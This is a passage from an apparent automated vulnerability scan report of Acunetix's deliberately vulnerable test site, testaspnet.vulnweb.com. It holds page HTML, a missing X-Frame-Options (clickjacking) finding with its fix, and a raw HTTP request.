WxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/sNcuYAa/cRqMvUgVyEWyccHwUIA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        22. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Content-Length: 3745
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3745 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9jwc%2FcRnTJwdNTwN8SPSTaigKqpw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
